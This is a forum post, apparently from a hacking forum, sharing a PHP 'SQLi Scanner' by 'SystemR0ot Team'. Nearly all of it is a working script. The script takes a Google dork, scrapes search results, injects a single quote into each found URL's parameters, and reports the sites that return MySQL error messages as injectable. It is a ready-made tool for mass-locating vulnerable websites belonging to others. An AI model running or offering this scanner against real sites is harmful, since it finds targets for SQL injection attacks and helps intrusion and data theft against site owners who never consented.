[PHP] SQL Scanner

И

Информатор

Легенда
Подтвержденный
Регистрация
15.04.15
Сообщения
10,280
Реакции
826
SystemR0ot Team - SQLi Scanner

SQLi Scanner
.: Modified by Cybertaziex :.

Kumpulan Dork Sql Injection Join Us : SystemR0ot Team

Dork :

<?php
ob_start();
set_time_limit(0);

if (isset($_POST['scan'])) {

$first = "startgoogle.startpagina.nl/index.php?q=";
$sec = "&start=";
$reg = '/<a href="(.*)" target="_self" onclick="/';

for($id=0 ; $id<=30; $id++){
$page=$id*10;
$dork=urlencode($_POST['dork']);
$url = $first.$dork.$sec.$page;

$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
$result = curl_exec($curl);
curl_close($curl);

preg_match_all($reg,$result,$matches);

foreach($matches[1] as $site){

$url = preg_replace("/=/", "='", $site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
curl_setopt($curl,CURLOPT_TIMEOUT,'5');
$GET=curl_exec($curl);
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
echo 'Found : '.$url.'';
ob_flush();flush();
}else{
echo ''.$url.'';
ob_flush();flush();
}

ob_flush();flush();
}
ob_flush();flush();
}
ob_flush();flush();
}

?>
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу